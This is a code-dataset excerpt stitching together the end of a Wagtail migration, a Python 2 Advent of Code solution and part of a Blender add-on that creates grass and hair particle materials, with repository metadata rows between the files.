('ad_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='CustomFormSubmission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('form_data', models.TextField()),
('submit_time', models.DateTimeField(auto_now_add=True, verbose_name='submit time')),
('page', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='wagtailcore.Page')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='question_form', to=settings.AUTH_USER_MODEL)),
],
options={
'unique_together': {('page', 'user')},
},
),
]
| 63.461905 | 449 | 0.602586 | 3,982 | 39,981 | 5.909342 | 0.073832 | 0.062726 | 0.052739 | 0.091794 | 0.898687 | 0.895712 | 0.872424 | 0.842888 | 0.827292 | 0.794399 | 0 | 0.009249 | 0.248193 | 39,981 | 629 | 450 | 63.562798 | 0.773604 | 0.001126 | 0 | 0.726688 | 1 | 0.001608 | 0.208294 | 0.017804 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009646 | 0 | 0.016077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c5874aec87d0b96da1af7a6bb4685758390b2502 | 1,854 | py | Python | day06.py | andreassjoberg/advent-of-code-2017 | cc982f37da5e4c50f076e65dc3b9d074b40facce | [
"MIT"
] | 2 | 2019-02-06T07:48:00.000Z | 2020-04-12T09:53:10.000Z | day06.py | andreassjoberg/advent-of-code-2017 | cc982f37da5e4c50f076e65dc3b9d074b40facce | [
"MIT"
] | null | null | null | day06.py | andreassjoberg/advent-of-code-2017 | cc982f37da5e4c50f076e65dc3b9d074b40facce | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Day 06 of advent of code"""
def exists(array, previous_arrays):
"""Tests if the array has been seen before"""
for i in previous_arrays:
if array == i:
return True
return False
def part_one(data):
"""Part one"""
previous = []
current = map(int, data.split())
cycles = 0
while not exists(current, previous):
cycles += 1
previous.append(current[:])
current_max = max(current)
index = current.index(current_max)
blocks = current[index]
current[index] = 0
for j in range(0, blocks):
spread_index = (index + 1 + j) % len(current)
current[spread_index] = current[spread_index] + 1
return cycles
def part_two(data):
"""Part two"""
previous = []
current = map(int, data.split())
cycles = 0
while not exists(current, previous):
cycles += 1
previous.append(current[:])
current_max = max(current)
index = current.index(current_max)
blocks = current[index]
current[index] = 0
for j in range(0, blocks):
spread_index = (index + 1 + j) % len(current)
current[spread_index] = current[spread_index] + 1
previous = []
cycles = 0
while not exists(current, previous):
cycles += 1
previous.append(current[:])
current_max = max(current)
index = current.index(current_max)
blocks = current[index]
current[index] = 0
for j in range(0, blocks):
spread_index = (index + 1 + j) % len(current)
current[spread_index] = current[spread_index] + 1
return cycles
if __name__ == '__main__':
with open('day06.input', 'r') as f:
INPUT_DATA = f.read()
print part_one(INPUT_DATA)
print part_two(INPUT_DATA)
| 28.090909 | 61 | 0.578209 | 229 | 1,854 | 4.541485 | 0.257642 | 0.138462 | 0.164423 | 0.138462 | 0.729808 | 0.729808 | 0.729808 | 0.729808 | 0.729808 | 0.729808 | 0 | 0.017028 | 0.303128 | 1,854 | 65 | 62 | 28.523077 | 0.787926 | 0.010787 | 0 | 0.769231 | 0 | 0 | 0.011561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c5cf0f6dd219eaab88ae51f2a37f30b4a88d78ed | 57,146 | py | Python | release/scripts/addons_contrib/object_particle_hair_lab.py | noorbeast/BlenderSource | 65ebecc5108388965678b04b43463b85f6c69c1d | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 2 | 2019-03-20T13:10:46.000Z | 2019-05-15T20:00:31.000Z | engine/2.80/scripts/addons_contrib/object_particle_hair_lab.py | byteinc/Phasor | f7d23a489c2b4bcc3c1961ac955926484ff8b8d9 | [
"Unlicense"
] | null | null | null | engine/2.80/scripts/addons_contrib/object_particle_hair_lab.py | byteinc/Phasor | f7d23a489c2b4bcc3c1961ac955926484ff8b8d9 | [
"Unlicense"
] | null | null | null | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
bl_info = {
"name": "Grass Lab",
"author": "Ondrej Raha(lokhorn), meta-androcto",
"version": (0, 5),
"blender": (2, 75, 0),
"location": "View3D > ToolShelf > Create Tab",
"description": "Creates particle grass with material",
"warning": "",
"wiki_url": "http://wiki.blender.org/index.php/Extensions:2.6/Py/Scripts/Object/Hair_Lab",
"tracker_url": "https://developer.blender.org/maniphest/task/edit/form/2/",
"category": "Object"}
import bpy
from bpy.props import *
# Returns the action we want to take
def getActionToDo(obj):
if not obj or obj.type != 'MESH':
return 'NOT_OBJ_DO_NOTHING'
elif obj.type == 'MESH':
return 'GENERATE'
else:
return "DO_NOTHING"
# TO DO
"""
class saveSelectionPanel(bpy.types.Panel):
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
bl_label = "Selection Save"
bl_options = {'DEFAULT_CLOSED'}
bl_context = "particlemode"
def draw(self, context):
layout = self.layout
col = layout.column(align=True)
col.operator("save.selection", text="Save Selection 1")
"""
######GRASS########################
class grassLabPanel(bpy.types.Panel):
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
bl_label = "Grass Lab"
bl_context = "objectmode"
bl_options = {'DEFAULT_CLOSED'}
bl_category = "Create"
def draw(self, context):
active_obj = bpy.context.active_object
active_scn = bpy.context.scene.name
layout = self.layout
col = layout.column(align=True)
WhatToDo = getActionToDo(active_obj)
if WhatToDo == "GENERATE":
col.operator("grass.generate_grass", text="Create grass")
col.prop(context.scene, "grass_type")
else:
col.label(text="Select mesh object")
if active_scn == "TestgrassScene":
col.operator("grass.switch_back", text="Switch back to scene")
else:
col.operator("grass.test_scene", text="Create Test Scene")
# TO DO
"""
class saveSelection(bpy.types.Operator):
bl_idname = "save.selection"
bl_label = "Save Selection"
bl_description = "Save selected particles"
bl_register = True
bl_undo = True
def execute(self, context):
return {'FINISHED'}
"""
class testScene1(bpy.types.Operator):
bl_idname = "grass.switch_back"
bl_label = "Switch back to scene"
bl_description = "If you want keep this scene, switch scene in info window"
bl_register = True
bl_undo = True
def execute(self, context):
scene = bpy.context.scene
bpy.data.scenes.remove(scene)
return {'FINISHED'}
class testScene2(bpy.types.Operator):
bl_idname = "grass.test_scene"
bl_label = "Create test scene"
bl_description = "You can switch scene in info panel"
bl_register = True
bl_undo = True
def execute(self, context):
# add new scene
bpy.ops.scene.new(type="NEW")
scene = bpy.context.scene
scene.name = "TestgrassScene"
# render settings
render = scene.render
render.resolution_x = 1920
render.resolution_y = 1080
render.resolution_percentage = 50
# add new world
world = bpy.data.worlds.new("grassWorld")
scene.world = world
world.use_sky_blend = True
world.use_sky_paper = True
world.horizon_color = (0.004393,0.02121,0.050)
world.zenith_color = (0.03335,0.227,0.359)
# add text
bpy.ops.object.text_add(location=(-0.292,0,-0.152), rotation =(1.571,0,0))
text = bpy.context.active_object
text.scale = (0.05,0.05,0.05)
text.data.body = "Grass Lab"
# add material to text
textMaterial = bpy.data.materials.new('textMaterial')
text.data.materials.append(textMaterial)
textMaterial.use_shadeless = True
# add camera
bpy.ops.object.camera_add(location = (0,-1,0),rotation = (1.571,0,0))
cam = bpy.context.active_object.data
cam.lens = 50
cam.display_size = 0.1
# add spot lamp
bpy.ops.object.lamp_add(type="SPOT", location = (-0.7,-0.5,0.3), rotation =(1.223,0,-0.960))
lamp1 = bpy.context.active_object.data
lamp1.name = "Key Light"
lamp1.energy = 1.5
lamp1.distance = 1.5
lamp1.shadow_buffer_soft = 5
lamp1.shadow_buffer_size = 8192
lamp1.shadow_buffer_clip_end = 1.5
lamp1.spot_blend = 0.5
# add spot lamp2
bpy.ops.object.lamp_add(type="SPOT", location = (0.7,-0.6,0.1), rotation =(1.571,0,0.785))
lamp2 = bpy.context.active_object.data
lamp2.name = "Fill Light"
lamp2.color = (0.874,0.874,1)
lamp2.energy = 0.5
lamp2.distance = 1.5
lamp2.shadow_buffer_soft = 5
lamp2.shadow_buffer_size = 4096
lamp2.shadow_buffer_clip_end = 1.5
lamp2.spot_blend = 0.5
# light Rim
"""
# add spot lamp3
bpy.ops.object.lamp_add(type="SPOT", location = (0.191,0.714,0.689), rotation =(0.891,0,2.884))
lamp3 = bpy.context.active_object.data
lamp3.name = "Rim Light"
lamp3.color = (0.194,0.477,1)
lamp3.energy = 3
lamp3.distance = 1.5
lamp3.shadow_buffer_soft = 5
lamp3.shadow_buffer_size = 4096
lamp3.shadow_buffer_clip_end = 1.5
lamp3.spot_blend = 0.5
"""
# add sphere
# add sphere
bpy.ops.mesh.primitive_uv_sphere_add(size=0.1)
bpy.ops.object.shade_smooth()
return {'FINISHED'}
class Generategrass(bpy.types.Operator):
bl_idname = "grass.generate_grass"
bl_label = "Generate grass"
bl_description = "Create a grass"
bl_register = True
bl_undo = True
def execute(self, context):
# Make variable that is the current .blend file main data blocks
blend_data = context.blend_data
ob = bpy.context.active_object
scene = context.scene
######################################################################
########################Test screen grass########################
if scene.grass_type == '0':
###############Create New Material##################
# add new material
grassMaterial = bpy.data.materials.new('greengrassMat')
ob.data.materials.append(grassMaterial)
#Material settings
grassMaterial.preview_render_type = "HAIR"
grassMaterial.diffuse_color = (0.09710, 0.288, 0.01687)
grassMaterial.specular_color = (0.604, 0.465, 0.136)
grassMaterial.specular_intensity = 0.3
grassMaterial.ambient = 0
grassMaterial.use_cubic = True
grassMaterial.use_transparency = True
grassMaterial.alpha = 0
grassMaterial.use_transparent_shadows = True
#strand
grassMaterial.strand.use_blender_units = True
grassMaterial.strand.root_size = 0.00030
grassMaterial.strand.tip_size = 0.00010
grassMaterial.strand.size_min = 0.7
grassMaterial.strand.width_fade = 0.1
grassMaterial.strand.shape = 0.061
grassMaterial.strand.blend_distance = 0.001
# add texture
grassTex = bpy.data.textures.new("greengrassTex", type='BLEND')
grassTex.use_preview_alpha = True
grassTex.use_color_ramp = True
ramp = grassTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.114,0.375,0.004025,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.267,0.155,0.02687,0]
rampElement1 = rampElements.new(0.111)
rampElement1.color = [0.281,0.598,0.03157,0.65]
rampElement2 = rampElements.new(0.366)
rampElement2.color = [0.119,0.528,0.136,0.87]
rampElement3 = rampElements.new(0.608)
rampElement3.color = [0.247,0.713,0.006472,0.8]
rampElement4 = rampElements.new(0.828)
rampElement4.color = [0.01943,0.163,0.01242,0.64]
# add texture to material
MTex = grassMaterial.texture_slots.add()
MTex.texture = grassTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
############### Create Particles ##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
grassParticles = bpy.context.object.particle_systems.active
grassParticles.name = "greengrassPar"
grassParticles.settings.type = "HAIR"
grassParticles.settings.use_advanced_hair = True
grassParticles.settings.count = 500
grassParticles.settings.normal_factor = 0.05
grassParticles.settings.factor_random = 0.001
grassParticles.settings.use_dynamic_rotation = True
grassParticles.settings.material = NumberOfMaterials
grassParticles.settings.use_strand_primitive = True
grassParticles.settings.use_hair_bspline = True
grassParticles.settings.render_step = 5
grassParticles.settings.length_random = 0.5
grassParticles.settings.display_step = 5
# children
grassParticles.settings.rendered_child_count = 50
grassParticles.settings.child_type = "INTERPOLATED"
grassParticles.settings.child_length = 0.250
grassParticles.settings.create_long_hair_children = True
grassParticles.settings.clump_shape = 0.074
grassParticles.settings.clump_factor = 0.55
grassParticles.settings.roughness_endpoint = 0.080
grassParticles.settings.roughness_end_shape = 0.80
grassParticles.settings.roughness_2 = 0.043
grassParticles.settings.roughness_2_size = 0.230
######################################################################
###################### Field Grass ########################
if scene.grass_type == '1':
###############Create New Material##################
# add new material
grassMaterial = bpy.data.materials.new('fieldgrassMat')
ob.data.materials.append(grassMaterial)
#Material settings
grassMaterial.preview_render_type = "HAIR"
grassMaterial.diffuse_color = (0.229, 0.800, 0.010)
grassMaterial.specular_color = (0.010, 0.06072, 0.000825)
grassMaterial.specular_intensity = 0.3
grassMaterial.specular_hardness = 100
grassMaterial.use_specular_ramp = True
ramp = grassMaterial.specular_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.0356,0.0652,0.009134,0]
rampElements[1].position = 1
rampElements[1].color = [0.352,0.750,0.231,1]
rampElement1 = rampElements.new(0.255)
rampElement1.color = [0.214,0.342,0.0578,0.31]
rampElement2 = rampElements.new(0.594)
rampElement2.color = [0.096,0.643,0.0861,0.72]
grassMaterial.ambient = 0
grassMaterial.use_cubic = True
grassMaterial.use_transparency = True
grassMaterial.alpha = 0
grassMaterial.use_transparent_shadows = True
#strand
grassMaterial.strand.use_blender_units = True
grassMaterial.strand.root_size = 0.00030
grassMaterial.strand.tip_size = 0.00015
grassMaterial.strand.size_min = 0.450
grassMaterial.strand.width_fade = 0.1
grassMaterial.strand.shape = 0.02
grassMaterial.strand.blend_distance = 0.001
# add texture
grassTex = bpy.data.textures.new("feildgrassTex", type='BLEND')
grassTex.name = "feildgrassTex"
grassTex.use_preview_alpha = True
grassTex.use_color_ramp = True
ramp = grassTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.009721,0.006049,0.003677,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.04231,0.02029,0.01444,0.16]
rampElement1 = rampElements.new(0.111)
rampElement1.color = [0.01467,0.005307,0.00316,0.65]
rampElement2 = rampElements.new(0.366)
rampElement2.color = [0.0272,0.01364,0.01013,0.87]
rampElement3 = rampElements.new(0.608)
rampElement3.color = [0.04445,0.02294,0.01729,0.8]
rampElement4 = rampElements.new(0.828)
rampElement4.color = [0.04092,0.0185,0.01161,0.64]
# add texture to material
MTex = grassMaterial.texture_slots.add()
MTex.texture = grassTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
grassParticles = bpy.context.object.particle_systems.active
grassParticles.name = "fieldgrassPar"
grassParticles.settings.type = "HAIR"
grassParticles.settings.use_emit_random = True
grassParticles.settings.use_even_distribution = True
grassParticles.settings.use_advanced_hair = True
grassParticles.settings.count = 2000
#Particle settings Velocity
grassParticles.settings.normal_factor = 0.060
grassParticles.settings.factor_random = 0.045
grassParticles.settings.use_dynamic_rotation = False
grassParticles.settings.brownian_factor = 0.070
grassParticles.settings.damping = 0.160
grassParticles.settings.material = NumberOfMaterials
# strands
grassParticles.settings.use_strand_primitive = True
grassParticles.settings.use_hair_bspline = True
grassParticles.settings.render_step = 7
grassParticles.settings.length_random = 1.0
grassParticles.settings.display_step = 2
# children
grassParticles.settings.child_type = "INTERPOLATED"
grassParticles.settings.child_length = 0.160
grassParticles.settings.create_long_hair_children = False
grassParticles.settings.clump_factor = 0.000
grassParticles.settings.clump_shape = 0.000
grassParticles.settings.roughness_endpoint = 0.000
grassParticles.settings.roughness_end_shape = 1
grassParticles.settings.roughness_2 = 0.200
grassParticles.settings.roughness_2_size = 0.230
######################################################################
########################Short Clumpped grass##########################
elif scene.grass_type == '2':
###############Create New Material##################
# add new material
grassMaterial = bpy.data.materials.new('clumpygrassMat')
ob.data.materials.append(grassMaterial)
#Material settings
grassMaterial.preview_render_type = "HAIR"
grassMaterial.diffuse_color = (0.01504, 0.05222, 0.007724)
grassMaterial.specular_color = (0.02610, 0.196, 0.04444)
grassMaterial.specular_intensity = 0.5
grassMaterial.specular_hardness = 100
grassMaterial.ambient = 0
grassMaterial.use_cubic = True
grassMaterial.use_transparency = True
grassMaterial.alpha = 0
grassMaterial.use_transparent_shadows = True
#strand
grassMaterial.strand.use_blender_units = True
grassMaterial.strand.root_size = 0.000315
grassMaterial.strand.tip_size = 0.00020
grassMaterial.strand.size_min = 0.2
grassMaterial.strand.width_fade = 0.1
grassMaterial.strand.shape = -0.900
grassMaterial.strand.blend_distance = 0.001
# add texture
grassTex = bpy.data.textures.new("clumpygrasstex", type='BLEND')
grassTex.use_preview_alpha = True
grassTex.use_color_ramp = True
ramp = grassTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.004025,0.002732,0.002428,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.141,0.622,0.107,0.2]
rampElement1 = rampElements.new(0.202)
rampElement1.color = [0.01885,0.2177,0.01827,0.65]
rampElement2 = rampElements.new(0.499)
rampElement2.color = [0.114,0.309,0.09822,0.87]
rampElement3 = rampElements.new(0.828)
rampElement3.color = [0.141,0.427,0.117,0.64]
# add texture to material
MTex = grassMaterial.texture_slots.add()
MTex.texture = grassTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
grassParticles = bpy.context.object.particle_systems.active
grassParticles.name = "clumpygrass"
grassParticles.settings.type = "HAIR"
grassParticles.settings.use_advanced_hair = True
grassParticles.settings.hair_step = 2
grassParticles.settings.count = 250
grassParticles.settings.normal_factor = 0.0082
grassParticles.settings.tangent_factor = 0.001
grassParticles.settings.tangent_phase = 0.250
grassParticles.settings.factor_random = 0.001
grassParticles.settings.use_dynamic_rotation = True
grassParticles.settings.material = NumberOfMaterials
grassParticles.settings.use_strand_primitive = True
grassParticles.settings.use_hair_bspline = True
grassParticles.settings.render_step = 3
grassParticles.settings.length_random = 0.3
grassParticles.settings.display_step = 3
# children
grassParticles.settings.child_type = "INTERPOLATED"
grassParticles.settings.child_length = 0.667
grassParticles.settings.child_length_threshold = 0.111
grassParticles.settings.rendered_child_count = 200
grassParticles.settings.virtual_parents = 1
grassParticles.settings.clump_factor = 0.425
grassParticles.settings.clump_shape = -0.999
grassParticles.settings.roughness_endpoint = 0.003
grassParticles.settings.roughness_end_shape = 5
return {'FINISHED'}
####
######### HAIR LAB ##########
####
class HairLabPanel(bpy.types.Panel):
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
bl_label = "Hair Lab"
bl_context = "objectmode"
bl_options = {'DEFAULT_CLOSED'}
bl_category = "Create"
def draw(self, context):
active_obj = bpy.context.active_object
active_scn = bpy.context.scene.name
layout = self.layout
col = layout.column(align=True)
WhatToDo = getActionToDo(active_obj)
if WhatToDo == "GENERATE":
col.operator("hair.generate_hair", text="Create Hair")
col.prop(context.scene, "hair_type")
else:
col.label(text="Select mesh object")
if active_scn == "TestHairScene":
col.operator("hair.switch_back", text="Switch back to scene")
else:
col.operator("hair.test_scene", text="Create Test Scene")
# TO DO
"""
class saveSelection(bpy.types.Operator):
bl_idname = "save.selection"
bl_label = "Save Selection"
bl_description = "Save selected particles"
bl_register = True
bl_undo = True
def execute(self, context):
return {'FINISHED'}
"""
class testScene3(bpy.types.Operator):
bl_idname = "hair.switch_back"
bl_label = "Switch back to scene"
bl_description = "If you want keep this scene, switch scene in info window"
bl_register = True
bl_undo = True
def execute(self, context):
scene = bpy.context.scene
bpy.data.scenes.remove(scene)
return {'FINISHED'}
class testScene4(bpy.types.Operator):
bl_idname = "hair.test_scene"
bl_label = "Create test scene"
bl_description = "You can switch scene in info panel"
bl_register = True
bl_undo = True
def execute(self, context):
# add new scene
bpy.ops.scene.new(type="NEW")
scene = bpy.context.scene
scene.name = "TestHairScene"
# render settings
render = scene.render
render.resolution_x = 1920
render.resolution_y = 1080
render.resolution_percentage = 50
# add new world
world = bpy.data.worlds.new("HairWorld")
scene.world = world
world.use_sky_blend = True
world.use_sky_paper = True
world.horizon_color = (0.004393,0.02121,0.050)
world.zenith_color = (0.03335,0.227,0.359)
# add text
bpy.ops.object.text_add(location=(-0.292,0,-0.152), rotation =(1.571,0,0))
text = bpy.context.active_object
text.scale = (0.05,0.05,0.05)
text.data.body = "Hair Lab"
# add material to text
textMaterial = bpy.data.materials.new('textMaterial')
text.data.materials.append(textMaterial)
textMaterial.use_shadeless = True
# add camera
bpy.ops.object.camera_add(location = (0,-1,0),rotation = (1.571,0,0))
cam = bpy.context.active_object.data
cam.lens = 50
cam.display_size = 0.1
# add spot lamp
bpy.ops.object.lamp_add(type="SPOT", location = (-0.7,-0.5,0.3), rotation =(1.223,0,-0.960))
lamp1 = bpy.context.active_object.data
lamp1.name = "Key Light"
lamp1.energy = 1.5
lamp1.distance = 1.5
lamp1.shadow_buffer_soft = 5
lamp1.shadow_buffer_size = 8192
lamp1.shadow_buffer_clip_end = 1.5
lamp1.spot_blend = 0.5
# add spot lamp2
bpy.ops.object.lamp_add(type="SPOT", location = (0.7,-0.6,0.1), rotation =(1.571,0,0.785))
lamp2 = bpy.context.active_object.data
lamp2.name = "Fill Light"
lamp2.color = (0.874,0.874,1)
lamp2.energy = 0.5
lamp2.distance = 1.5
lamp2.shadow_buffer_soft = 5
lamp2.shadow_buffer_size = 4096
lamp2.shadow_buffer_clip_end = 1.5
lamp2.spot_blend = 0.5
# light Rim
"""
# add spot lamp3
bpy.ops.object.lamp_add(type="SPOT", location = (0.191,0.714,0.689), rotation =(0.891,0,2.884))
lamp3 = bpy.context.active_object.data
lamp3.name = "Rim Light"
lamp3.color = (0.194,0.477,1)
lamp3.energy = 3
lamp3.distance = 1.5
lamp3.shadow_buffer_soft = 5
lamp3.shadow_buffer_size = 4096
lamp3.shadow_buffer_clip_end = 1.5
lamp3.spot_blend = 0.5
"""
# add sphere
bpy.ops.mesh.primitive_uv_sphere_add(size=0.1)
bpy.ops.object.shade_smooth()
return {'FINISHED'}
class GenerateHair(bpy.types.Operator):
bl_idname = "hair.generate_hair"
bl_label = "Generate Hair"
bl_description = "Create a Hair"
bl_register = True
bl_undo = True
def execute(self, context):
# Make variable that is the current .blend file main data blocks
blend_data = context.blend_data
ob = bpy.context.active_object
scene = context.scene
######################################################################
########################Long Red Straight Hair########################
if scene.hair_type == '0':
###############Create New Material##################
# add new material
hairMaterial = bpy.data.materials.new('LongRedStraightHairMat')
ob.data.materials.append(hairMaterial)
#Material settings
hairMaterial.preview_render_type = "HAIR"
hairMaterial.diffuse_color = (0.287, 0.216, 0.04667)
hairMaterial.specular_color = (0.604, 0.465, 0.136)
hairMaterial.specular_intensity = 0.3
hairMaterial.ambient = 0
hairMaterial.use_cubic = True
hairMaterial.use_transparency = True
hairMaterial.alpha = 0
hairMaterial.use_transparent_shadows = True
#strand
hairMaterial.strand.use_blender_units = True
hairMaterial.strand.root_size = 0.00030
hairMaterial.strand.tip_size = 0.00010
hairMaterial.strand.size_min = 0.7
hairMaterial.strand.width_fade = 0.1
hairMaterial.strand.shape = 0.061
hairMaterial.strand.blend_distance = 0.001
# add texture
hairTex = bpy.data.textures.new("LongRedStraightHairTex", type='BLEND')
hairTex.use_preview_alpha = True
hairTex.use_color_ramp = True
ramp = hairTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.114,0.05613,0.004025,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.267,0.155,0.02687,0]
rampElement1 = rampElements.new(0.111)
rampElement1.color = [0.281,0.168,0.03157,0.65]
rampElement2 = rampElements.new(0.366)
rampElement2.color = [0.288,0.135,0.006242,0.87]
rampElement3 = rampElements.new(0.608)
rampElement3.color = [0.247,0.113,0.006472,0.8]
rampElement4 = rampElements.new(0.828)
rampElement4.color = [0.253,0.09919,0.01242,0.64]
# add texture to material
MTex = hairMaterial.texture_slots.add()
MTex.texture = hairTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
hairParticles = bpy.context.object.particle_systems.active
hairParticles.name = "LongRedStraightHairPar"
hairParticles.settings.type = "HAIR"
hairParticles.settings.use_advanced_hair = True
hairParticles.settings.count = 500
hairParticles.settings.normal_factor = 0.05
hairParticles.settings.factor_random = 0.001
hairParticles.settings.use_dynamic_rotation = True
hairParticles.settings.material = NumberOfMaterials
hairParticles.settings.use_strand_primitive = True
hairParticles.settings.use_hair_bspline = True
hairParticles.settings.render_step = 5
hairParticles.settings.length_random = 0.5
hairParticles.settings.display_step = 5
# children
hairParticles.settings.child_type = "INTERPOLATED"
hairParticles.settings.create_long_hair_children = True
hairParticles.settings.clump_factor = 0.55
hairParticles.settings.roughness_endpoint = 0.005
hairParticles.settings.roughness_end_shape = 5
hairParticles.settings.roughness_2 = 0.003
hairParticles.settings.roughness_2_size = 0.230
######################################################################
########################Long Brown Curl Hair##########################
if scene.hair_type == '1':
###############Create New Material##################
# add new material
hairMaterial = bpy.data.materials.new('LongBrownCurlHairMat')
ob.data.materials.append(hairMaterial)
#Material settings
hairMaterial.preview_render_type = "HAIR"
hairMaterial.diffuse_color = (0.662, 0.518, 0.458)
hairMaterial.specular_color = (0.351, 0.249, 0.230)
hairMaterial.specular_intensity = 0.3
hairMaterial.specular_hardness = 100
hairMaterial.use_specular_ramp = True
ramp = hairMaterial.specular_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.0356,0.0152,0.009134,0]
rampElements[1].position = 1
rampElements[1].color = [0.352,0.250,0.231,1]
rampElement1 = rampElements.new(0.255)
rampElement1.color = [0.214,0.08244,0.0578,0.31]
rampElement2 = rampElements.new(0.594)
rampElement2.color = [0.296,0.143,0.0861,0.72]
hairMaterial.ambient = 0
hairMaterial.use_cubic = True
hairMaterial.use_transparency = True
hairMaterial.alpha = 0
hairMaterial.use_transparent_shadows = True
#strand
hairMaterial.strand.use_blender_units = True
hairMaterial.strand.root_size = 0.00030
hairMaterial.strand.tip_size = 0.00015
hairMaterial.strand.size_min = 0.450
hairMaterial.strand.width_fade = 0.1
hairMaterial.strand.shape = 0.02
hairMaterial.strand.blend_distance = 0.001
# add texture
hairTex = bpy.data.textures.new("HairTex", type='BLEND')
hairTex.name = "LongBrownCurlHairTex"
hairTex.use_preview_alpha = True
hairTex.use_color_ramp = True
ramp = hairTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.009721,0.006049,0.003677,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.04231,0.02029,0.01444,0.16]
rampElement1 = rampElements.new(0.111)
rampElement1.color = [0.01467,0.005307,0.00316,0.65]
rampElement2 = rampElements.new(0.366)
rampElement2.color = [0.0272,0.01364,0.01013,0.87]
rampElement3 = rampElements.new(0.608)
rampElement3.color = [0.04445,0.02294,0.01729,0.8]
rampElement4 = rampElements.new(0.828)
rampElement4.color = [0.04092,0.0185,0.01161,0.64]
# add texture to material
MTex = hairMaterial.texture_slots.add()
MTex.texture = hairTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
hairParticles = bpy.context.object.particle_systems.active
hairParticles.name = "LongBrownCurlHairPar"
hairParticles.settings.type = "HAIR"
hairParticles.settings.use_advanced_hair = True
hairParticles.settings.count = 500
hairParticles.settings.normal_factor = 0.05
hairParticles.settings.factor_random = 0.001
hairParticles.settings.use_dynamic_rotation = True
hairParticles.settings.material = NumberOfMaterials
hairParticles.settings.use_strand_primitive = True
hairParticles.settings.use_hair_bspline = True
hairParticles.settings.render_step = 7
hairParticles.settings.length_random = 0.5
hairParticles.settings.display_step = 5
# children
hairParticles.settings.child_type = "INTERPOLATED"
hairParticles.settings.create_long_hair_children = True
hairParticles.settings.clump_factor = 0.523
hairParticles.settings.clump_shape = 0.383
hairParticles.settings.roughness_endpoint = 0.002
hairParticles.settings.roughness_end_shape = 5
hairParticles.settings.roughness_2 = 0.003
hairParticles.settings.roughness_2_size = 2
hairParticles.settings.kink = "CURL"
hairParticles.settings.kink_amplitude = 0.007597
hairParticles.settings.kink_frequency = 6
hairParticles.settings.kink_shape = 0.4
hairParticles.settings.kink_flat = 0.8
######################################################################
########################Short Dark Hair##########################
elif scene.hair_type == '2':
###############Create New Material##################
# add new material
hairMaterial = bpy.data.materials.new('ShortDarkHairMat')
ob.data.materials.append(hairMaterial)
#Material settings
hairMaterial.preview_render_type = "HAIR"
hairMaterial.diffuse_color = (0.560, 0.536, 0.506)
hairMaterial.specular_color = (0.196, 0.177, 0.162)
